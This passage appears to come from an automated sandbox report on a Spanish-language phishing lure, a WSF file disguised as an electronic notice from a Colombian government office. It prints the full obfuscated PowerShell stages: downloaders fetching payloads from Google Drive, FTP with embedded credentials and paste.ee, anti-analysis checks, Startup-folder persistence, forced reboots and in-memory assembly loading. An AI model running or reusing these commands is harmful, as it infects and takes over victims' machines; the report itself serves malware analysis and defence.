'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 'bACAAKwAgACcAXA' + [char]66 + 'zAHIAZQ' + [char]66 + 'zAFUAXAA6AEMAJwAoACAAPQAgAFoAdw' + [char]66 + 'mAHcAVQAkADsAKQAgACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgACwAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKA' + [char]66 + 'lAGwAaQ' + [char]66 + 'GAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHEAdw' + [char]66 + 'qAHYAegAkADsAOA' + [char]66 + 'GAFQAVQA6ADoAXQ' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + '0AHgAZQ' + [char]66 + 'UAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'nAG4AaQ' + [char]66 + 'kAG8AYw' + [char]66 + 'uAEUALg' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7ACkAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AKAAgAD0AIA' + [char]66 + 'xAHcAag' + [char]66 + '2AHoAJAA7AH0AOwAgACkAJw' + [char]66 + '3ADUAMA' + [char]66 + 'aADEAOA' + [char]66 + '1AGMANw' + [char]66 + 'aAE0ASwA4ADgAZw' + [char]66 + 'lAHQAaA' + [char]66 + 'qAG4AQQ' + [char]66 + 'wAGoAMQ' + [char]66 + 'MAEIALQA0AHkASA' + [char]66 + 'hAGEAMQAnACAAKwAgAHYAZg' + [char]66 + 'xAG0AbgAkACgAIAA9ACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAewAgAGUAcw' + [char]66 + 'sAGUAfQA7ACAAKQAnAFYARQ' + [char]66 + 'TAGQAag' + [char]66 + '3AFUAOQA1AFIALQ' + [char]66 + 'XAHMAWQ' + [char]66 + '1AFoATA' + [char]66 + 'pAHcAcg' + [char]66 + 'iADUAWQ' + [char]66 + 'OAFEALQ' + [char]66 + 'IAGoAcg' + [char]66 + 'iADIAcAAxACcAIAArACAAdg' + [char]66 + 'mAHEAbQ' + [char]66 + 'uACQAKAAgAD0AIA' + [char]66 + '2AGYAcQ' + [char]66 + 'tAG4AJA' + [char]66 + '7ACAAKQAgAGkAZg' + [char]66 + 'tAHUAWAAkACAAKAAgAGYAaQA7ACAAKQAnADQANgAnACgAcw' + [char]66 + 'uAGkAYQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC4ARQ' + [char]66 + 'SAFUAVA' + [char]66 + 'DAEUAVA' + [char]66 + 'JAEgAQw' + [char]66 + 'SAEEAXw' + [char]66 + 'SAE8AUw' + [char]66 + 'TAEUAQw' + [char]66 + 'PAFIAUAA6AHYAbg' + [char]66 + 'lACQAIAA9ACAAaQ' + [char]66 + 'mAG0AdQ' + [char]66 + 'YACQAOwAnAD0AZA' + [char]66 + 'pACYAZA' + [char]66 + 'hAG8AbA' + [char]66 + 'uAHcAbw' + [char]66 + 'kAD0AdA' + [char]66 + 'yAG8AcA' + [char]66 + '4AGUAPw' + [char]66 + 'jAHUALw' + [char]66 + 'tAG8AYwAuAGUAbA' + [char]66 + 'nAG8Abw' + [char]66 + 'nAC4AZQ' + [char]66 + '2AGkAcg' + [char]66 + 'kAC8ALwA6AHMAcA' + [char]66 + '0AHQAaAAnACAAPQAgAHYAZg' + [char]66 + 'xAG0AbgAkADsAKQAgACcAdQ' + [char]66 + 'zAG0ALg' + [char]66 + 'uAGkAdw' + [char]66 + 'wAFUAXAAnACAAKwAgAGoATQ' + [char]66 + 'PAHoASAAkACAAKAAgAGwAZQ' + [char]66 + 'kADsAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'qAE0ATw' + [char]66 + '6AEgAJA' + [char]66 + '7ACAAKQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAKAAgAGYAaQA7ACAAKQAyACgAcw' + [char]66 + 'sAGEAdQ' + [char]66 + 'xAEUALg' + [char]66 + 'yAG8Aag' + [char]66 + 'hAE0ALg' + [char]66 + 'uAG8AaQ' + [char]66 + 'zAHIAZQ' + [char]66 + 'WAC4AdA' + [char]66 + 'zAG8AaAAkACAAPQAgAEMAZQ' + [char]66 + 'PAEkAYwAkACAAOwA=';$nymcr = $nymcr.replace('уЦϚ' , 'B') ;;$cpdfb = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String( $nymcr ) ); $cpdfb = $cpdfb[-1..-$cpdfb.Length] -join '';$cpdfb = $cpdfb.replace('%XRqhI%','C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF');powershell $cpdfb
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1796
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "; $cIOeC = $host.Version.Major.Equals(2) ;if ( $cIOeC ) {$HzOMj = [System.IO.Path]::GetTempPath();del ( $HzOMj + '\Upwin.msu' );$nmqfv = 'https://drive.google.com/uc?export=download&id=';$Xumfi = $env:PROCESSOR_ARCHITECTURE.Contains('64') ;if ( $Xumfi ) {$nmqfv = ($nmqfv + '1p2brjH-QNY5brwiLZuYsW-R59UwjdSEV') ;}else {$nmqfv = ($nmqfv + '1aaHy4-BL1jpAnjhteg88KMZ7cu81Z05w') ;};$zvjwq = (New-Object Net.WebClient);$zvjwq.Encoding = [System.Text.Encoding]::UTF8;$zvjwq.DownloadFile($nmqfv, ($HzOMj + '\Upwin.msu') );$UwfwZ = ('C:\Users\' + [Environment]::UserName );JCCGX = ($HzOMj + '\Upwin.msu'); powershell.exe wusa.exe JCCGX /quiet /norestart ; Copy-Item 'C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF' -Destination ( $UwfwZ + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit; };$nqcnz = ('ftp://[email protected]/Upcrypter' + '/01/DLL01.txt' );$JukpV = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$LQQAB = (-join [char[]](100,101,115,99,107,118,98,114,97,116,49)) ;$lllGq = (-join [char[]](102, 89, 117, 100, 89, 49, 53, 55, 56, 64, 64, 64, 64, 64, 64 )) ;$webClient = New-Object System.Net.WebClient ;$webClient.Credentials = new-object System.Net.NetworkCredential($LQQAB, $lllGq) ;$RVUXv = $webClient.DownloadString( $nqcnz ) ;$RVUXv | Out-File -FilePath $JukpV -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $JukpV ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$aeDwU = '$sNwoM = ''C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF'' ; $ryaeG = (Get-Content -Path ' + $STfGl + ' -Encoding UTF8);' ;$aeDwU += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''↓:↓'',''A'') ) ;' ;$aeDwU += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$aeDwU += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$aeDwU += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''0/zpfHt/d/ee.etsap//:sptth'' , $sNwoM , ''DDDMSBuild'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$aeDwU | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"
        5⤵
        Drops startup file
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2688
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe JCCGX /quiet /norestart
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3568
        
        C:\Windows\system32\wusa.exe
        
        "C:\Windows\system32\wusa.exe" JCCGX /quiet /norestart
        7⤵
        Drops file in Windows directory
        
        PID:3676
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3708
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\NOTICIACION ELECTRONICA Procuraduría Delegada para las Entidades Territoriales y Diálogo Social.WSF"
    3⤵
    - Blocklisted process makes network request
    PID:2612
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $nymcr = 'Ow' + [char]66 + '9ADsAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGUAbA' + [char]66 + 'pAEYALQAgAHMAcw' + [char]66 + 'hAHAAeQ' + [char]66 + 'CACAAeQ' + [char]66 + 'jAGkAbA' + [char]66 + 'vAFAAbg' + [char]66 + 'vAGkAdA' + [char]66 + '1AGMAZQ' + [char]66 + '4AEUALQAgAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAOwAgAGUAYw' + [char]66 + 'yAG8AZgAtACAAIA' + [char]66 + '6AFcAVw' + [char]66 + 'CAFYAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAApACAAJwAxAHMAcAAuADMAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAHoAVw' + [char]66 + 'XAEIAVgAkADsAJwA7ACkAIAApACAAIAAnACcAZA' + [char]66 + 'sAGkAdQ' + [char]66 + 'CAFMATQ' + [char]66 + 'EAEQARAAnACcAIAAgACwAIA' + [char]66 + 'NAG8Adw' + [char]66 + 'OAHMAJAAgACwAIAAnACcAaA' + [char]66 + '0AHQAcA' + [char]66 + 'zADoALwAvAHAAYQ' + [char]66 + 'zAHQAZQAuAGUAZQAvAGQALw' + [char]66 + '0AEgAZg' + [char]66 + 'wAHoALwAwACcAJwAgACgAIA' + [char]66 + 'dAF0AWw' + [char]66 + '0AGMAZQ' + [char]66 + 'qAGIAbw' + [char]66 + 'bACAALAAgAGwAbA' + [char]66 + '1AG4AJAAgACgAZQ' + [char]66 + 'rAG8Adg' + [char]66 + 'uAEkALgApACAAJwAnAEkAVg' + [char]66 + 'GAHIAcAAnACcAIAAoAGQAbw' + [char]66 + 'oAHQAZQAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcATQ' + [char]66 + '0AGUARwAuACkAIAAnACcAMQ' + [char]66 + 'zAHMAYQ' + [char]66 + 'sAEMALgAzAHkAcg' + [char]66 + 'hAHIAYg' + [char]66 + 'pAEwAcw' + [char]66 + 'zAGEAbA' + [char]66 + 'DACcAJwAgACgAZQ' + [char]66 + 'wAHkAVA' + [char]66 + '0AGUARwAnACAAPQArACAAVQ' + [char]66 + '3AEQAZQ' + [char]66 + 'hACQAOwAgACcALgApACAAeg' + [char]66 + 'kAGYAeQ' + [char]66 + 'GACQAIAAoAGQAYQ' + [char]66 + 'vAEwALg' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + '0AG4AZQ' + [char]66 + 'yAHIAdQ' + [char]66 + 'DADoAJwAgACsAIAAnADoAXQ' + [char]66 + 'uAGkAYQ' + [char]66 + 'tAG8ARA' + [char]66 + 'wAHAAQQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAJwAgAD0AKwAgAFUAdw' + [char]66 + 'EAGUAYQAkADsAIAAnADsAIAApACAAKQAnACcAQQAnACcALAAnACcAkyE6AJMhJwAnACgAZQ' + [char]66 + 'jAGEAbA' + [char]66 + 'wAGUAcgAuAEcAZQ' + [char]66 + 'hAHkAcgAkACAAKA' + [char]66 + 'nAG4AaQ' + [char]66 + 'yAHQAUwA0ADYAZQ' + [char]66 + 'zAGEAQg' + [char]66 + 'tAG8Acg' + [char]66 + 'GADoAOg' + [char]66 + 'dAHQAcg' + [char]66 + 'lAHYAbg' + [char]66 + 'vAEMALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAcw' + [char]66 + 'bACAAPQAgAHoAZA' + [char]66 + 'mAHkARgAkACAAXQ' + [char]66 + 'dAFsAZQ' + [char]66 + '0AHkAQg' + [char]66 + 'bACcAIAA9ACsAIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAJwA7ACkAOA' + [char]66 + 'GAFQAVQAgAGcAbg' + [char]66 + 'pAGQAbw' + [char]66 + 'jAG4ARQAtACAAJwAgACsAIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgACsAIAAnACAAaA' + [char]66 + '0AGEAUAAtACAAdA' + [char]66 + 'uAGUAdA' + [char]66 + 'uAG8AQwAtAHQAZQ' + [char]66 + 'HACgAIAA9ACAARw' + [char]66 + 'lAGEAeQ' + [char]66 + 'yACQAIAA7ACAAJwAnACUASQ' + [char]66 + 'oAHEAUg' + [char]66 + 'YACUAJwAnACAAPQAgAE0Abw' + [char]66 + '3AE4AcwAkACcAIAAgAD0AIA' + [char]66 + 'VAHcARA' + [char]66 + 'lAGEAJAA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'sAEcAZg' + [char]66 + 'UAFMAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAE4AbA' + [char]66 + 'yAGgAUAAkACAAPQAgAHoASA' + [char]66 + 'sAFQAdQAkADsAIAApACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAIA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC0AIA' + [char]66 + '0AG4AZQ' + [char]66 + '0AG4Abw' + [char]66 + 'DAC0AdA' + [char]66 + 'lAEcAIAAoACAAPQAgACAAQQ' + [char]66 + 'VAHoASA' + [char]66 + 'EACQAOwAgADgARg' + [char]66 + 'UAFUAOgA6AF0AZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4AdA' + [char]66 + '4AGUAVAAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAA9ACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC4ATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + 'XAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'PAC0Adw' + [char]66 + 'lAE4AIAA9ACAATg' + [char]66 + 'sAHIAaA' + [char]66 + 'QACQAOwAgACkAJw' + [char]66 + '0AHgAdAAuADIAMA' + [char]66 + 'sAGwAZAAnACAAKwAgACkAKA' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAHAAbQ' + [char]66 + 'lAFQAdA' + [char]66 + 'lAEcAOgA6AF0AaA' + [char]66 + '0AGEAUAAuAE8ASQAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAIAAoACAAPQAgAGwARw' + [char]66 + 'mAFQAUwAkADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACcAOA' + [char]66 + 'GAFQAVQAnACAAZw' + [char]66 + 'uAGkAZA' + [char]66 + 'vAGMAbg' + [char]66 + 'FAC0AIA' + [char]66 + 'WAHAAaw' + [char]66 + '1AEoAJAAgAGgAdA' + [char]66 + 'hAFAAZQ' + [char]66 + 'sAGkARgAtACAAZQ' + [char]66 + 'sAGkARgAtAHQAdQ' + [char]66 + 'PACAAfAAgAHYAWA' + [char]66 + 'VAFYAUgAkADsAIAApACAAeg' + [char]66 + 'uAGMAcQ' + [char]66 + 'uACQAIAAoAGcAbg' + [char]66 + 'pAHIAdA' + [char]66 + 'TAGQAYQ' + [char]66 + 'vAGwAbg' + [char]66 + '3AG8ARAAuAHQAbg' + [char]66 + 'lAGkAbA' + [char]66 + 'DAGIAZQ' + [char]66 + '3ACQAIAA9ACAAdg' + [char]66 + 'YAFUAVg' + [char]66 + 'SACQAOwAgACkAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAIAAsAEIAQQ' + [char]66 + 'RAFEATAAkACgAbA' + [char]66 + 'hAGkAdA' + [char]66 + 'uAGUAZA' + [char]66 + 'lAHIAQw' + [char]66 + 'rAHIAbw' + [char]66 + '3AHQAZQ' + [char]66 + 'OAC4AdA' + [char]66 + 'lAE4ALg' + [char]66 + 'tAGUAdA' + [char]66 + 'zAHkAUwAgAHQAYw' + [char]66 + 'lAGoAYg' + [char]66 + 'vAC0Adw' + [char]66 + 'lAG4AIAA9ACAAcw' + [char]66 + 'sAGEAaQ' + [char]66 + '0AG4AZQ' + [char]66 + 'kAGUAcg' + [char]66 + 'DAC4AdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAHcAJAA7ACAAdA' + [char]66 + 'uAGUAaQ' + [char]66 + 'sAEMAYg' + [char]66 + 'lAFcALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TACAAdA' + [char]66 + 'jAGUAag' + [char]66 + 'iAE8ALQ' + [char]66 + '3AGUATgAgAD0AIA' + [char]66 + '0AG4AZQ' + [char]66 + 'pAGwAQw' + [char]66 + 'iAGUAdwAkADsAIAApACkAIAA0ADYAIAAsADQANgAgACwANAA2ACAALAA0ADYAIAAsADQANgAgACwANAA2ACAALAA2ADUAIAAsADUANQAgACwAMwA1ACAALAA5ADQAIAAsADkAOAAgACwAMAAwADEAIAAsADcAMQAxACAALAA5ADgAIAAsADIAMAAxACgAXQ' + [char]66 + 'dAFsAcg' + [char]66 + 'hAGgAYw' + [char]66 + 'bACAAbg' + [char]66 + 'pAG8AagAtACgAIAA9ACAAcQ' + [char]66 + 'HAGwAbA' + [char]66 + 'sACQAOwAgACkAKQA5ADQALAA2ADEAMQAsADcAOQAsADQAMQAxACwAOAA5ACwAOAAxADEALAA3ADAAMQAsADkAOQAsADUAMQAxACwAMQAwADEALAAwADAAMQAoAF0AXQ' + [char]66 + 'bAHIAYQ' + [char]66 + 'oAGMAWwAgAG4AaQ' + [char]66 + 'vAGoALQAoACAAPQAgAEIAQQ' + [char]66 + 'RAFEATAAkADsAKQAnAHQAeA' + [char]66 + '0AC4AMQAwAGwAbA' + [char]66 + 'kACcAIAArACAAKQAoAGgAdA' + [char]66 + 'hAFAAcA' + [char]66 + 'tAGUAVA' + [char]66 + '0AGUARwA6ADoAXQ' + [char]66 + 'oAHQAYQ' + [char]66 + 'QAC4ATw' + [char]66 + 'JAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgACgAIAA9ACAAVg' + [char]66 + 'wAGsAdQ' + [char]66 + 'KACQAOwApACAAJw' + [char]66 + '0AHgAdAAuADEAMA' + [char]66 + 'MAEwARAAvADEAMAAvACcAIAArACAAJw' + [char]66 + 'yAGUAdA' + [char]66 + 'wAHkAcg' + [char]66 + 'jAHAAVQAvAHIAYgAuAG0Abw' + [char]66 + 'jAC4AdA' + [char]66 + 'hAHIAYg' + [char]66 + '2AGsAYw' + [char]66 + 'zAGUAZAAuAHAAdA' + [char]66 + 'mAEAAMQ' + [char]66 + '0AGEAcg' + [char]66 + 'iAHYAaw' + [char]66 + 'jAHMAZQ' + [char]66 + 'kAC8ALwA6AHAAdA' + [char]66 + 'mACcAKAAgAD0AIA' + [char]66 + '6AG4AYw' + [char]66 + 'xAG4AJAA7AH0AIAAKAA0AOw' + [char]66 + '0AGkAeA' + [char]66 + 'lACAAIAAgACAAIAAgAAoADQA7ACAAZQ' + [char]66 + 'jAHIAbw' + [char]66 + 'mAC0AIA' + [char]66 + 'yAGUAdA' + [char]66 + '1AHAAbQ' + [char]66 + 'vAEMALQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'SAAoADQAgAHsAZQ' + [char]66 + 'zAGwAZQAKAA0ACgANAH0ACgANACAAIAAgACAAIAAgACAACgANACAAewApAGwAbA' + [char]66 + '1AE4AJAAgAHEAZQAtACAAKQ' + [char]66 + 'lAHUAbg' + [char]66 + 'pAHQAbg' + [char]66 + 'vAEMAeQ' + [char]66 + 'sAHQAbg' + [char]66 + 'lAGwAaQ' + [char]66 + 'TACAAYQ' + [char]66 + 'lAC0AIAAnAGUAeg' + [char]66 + '5AGwAYQ' + [char]66 + 'uAGEAJwAsACcAUw' + [char]66 + 'OAEQAZQ' + [char]66 + '0AGEAcA' + [char]66 + 'hACcALAAnAGsAcg' + [char]66 + 'hAGgAcw' + [char]66 + 'lAHIAaQ' + [char]66 + 'XACcAIA' + [char]66 + 'zAHMAZQ' + [char]66 + 'jAG8Acg' + [char]66 + 'wAC0AdA' + [char]66 + 'lAGcAKAAoAGYAaQA7ACAAMgAxAHMAbA' + [char]66 + 'UADoAOg' + [char]66 + 'dAGUAcA' + [char]66 + '5AFQAbA' + [char]66 + 'vAGMAbw' + [char]66 + '0AG8Acg' + [char]66 + 'QAHkAdA' + [char]66 + 'pAHIAdQ' + [char]66 + 'jAGUAUwAuAHQAZQ' + [char]66 + 'OAC4AbQ' + [char]66 + 'lAHQAcw' + [char]66 + '5AFMAWwAgAD0AIA' + [char]66 + 'sAG8AYw' + [char]66 + 'vAHQAbw' + [char]66 + 'yAFAAeQ' + [char]66 + '0AGkAcg' + [char]66 + '1AGMAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAOwAgAH0AZQ' + [char]66 + '1AHIAdAAkAHsAIAA9ACAAaw' + [char]66 + 'jAGEAYg' + [char]66 + 'sAGwAYQ' + [char]66 + 'DAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'kAGkAbA' + [char]66 + 'hAFYAZQ' + [char]66 + '0AGEAYw' + [char]66 + 'pAGYAaQ' + [char]66 + '0AHIAZQ' + [char]66 + 'DAHIAZQ' + [char]66 + '2AHIAZQ' + [char]66 + 'TADoAOg' + [char]66 + 'dAHIAZQ' + [char]66 + 'nAGEAbg' + [char]66 + 'hAE0AdA' + [char]66 + 'uAGkAbw' + [char]66 + 'QAGUAYw' + [char]66 + 'pAHYAcg' + [char]66 + 'lAFMALg' + [char]66 + '0AGUATgAuAG0AZQ' + [char]66 + '0AHMAeQ' + [char]66 + 'TAFsAewAgAGUAcw' + [char]66 + 'sAGUAfQAgAGYALwAgADAAIA' + [char]66 + '0AC8AIA' + [char]66 + 'yAC8AIA' + [char]66 + 'lAHgAZQAuAG4Adw' + [char]66 + 'vAGQAdA' + [char]66 + '1AGgAcwAgADsAJwAwADgAMQAgAHAAZQ' + [char]66 + 'lAGwAcwAnACAAZA' + [char]66 + 'uAGEAbQ' + [char]66 + 'tAG8AYwAtACAAZQ' + [char]66 + '4AGUALg' + [char]66 + 'sAGwAZQ' + [char]66 + 'oAHMAcg' + [char]66 + 'lAHcAbw' + [char]66 + 'wADsAIA' + [char]66 + 'lAGMAcg' + [char]66 + 'vAGYALQAgACkAIAAnAHAAdQ' + [char]66 + '0AHIAYQ' + [char]66 + '0AFMAXA' + [char]66 + 'zAG0AYQ' + [char]66 + 'yAGcAbw' + [char]66 + 'yAFAAXA' + [char]66 + '1AG4AZQ' + [char]66 + 'NACAAdA' + [char]66 + 'yAGEAdA' + [char]66 + 'TAFwAcw' + [char]66 + '3AG8AZA' + [char]66 + 'uAGkAVw' + [char]66 + 'cAHQAZg' + [char]66 + 'vAHMAbw' + [char]66 + 'yAGMAaQ' + [char]66 + 'NAFwAZw' + [char]66 + 'uAGkAbQ' + [char]66 + 'hAG8AUg' + [char]66 + 'cAGEAdA' + [char]66 + 'hAEQAcA' + [char]66 + 'wAEEAXAAnACAAKwAgAFoAdw' + [char]66 + 'mAHcAVQAkACAAKAAgAG4Abw' + [char]66 + 'pAHQAYQ' + [char]66 + 'uAGkAdA' + [char]66 + 'zAGUARAAtACAAJwAlAEkAaA' + [char]66 + 'xAFIAWAAlACcAIA' + [char]66 + 'tAGUAdA' + [char]66 + 'JAC0AeQ' + [char]66 + 'wAG8AQwAgADsAIA' + [char]66 + '0AHIAYQ' + [char]66 + '0AHMAZQ' + [char]66 + 'yAG8AbgAvACAAdA' + [char]66 + 'lAGkAdQ' + [char]66 + 'xAC8AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAIA' + [char]66 + 'lAHgAZQAuAGEAcw' + [char]66 + '1AHcAIA' + [char]66 + 'lAHgAZQAuAGwAbA' + [char]66 + 'lAGgAcw' + [char]66 + 'yAGUAdw' + [char]66 + 'vAHAAIAA7ACkAJw' + [char]66 + '1AHMAbQAuAG4AaQ' + [char]66 + '3AHAAVQ' + [char]66 + 'cACcAIAArACAAag' + [char]66 + 'NAE8Aeg' + [char]66 + 'IACQAKAAgAD0AIA' + [char]66 + 'YAEcAQw' + [char]66 + 'DAEoAOwApACAAZQ' + [char]66 + 'tAGEATg' + [char]66 + 'yAGUAcw' + [char]66 + 'VADoAOg' + [char]66 + 'dAHQAbg' + [char]66 + 'lAG0Abg' + [char]66 + 'vAHIAaQ' + [char]66 + '2AG4ARQ' + [char]66 + 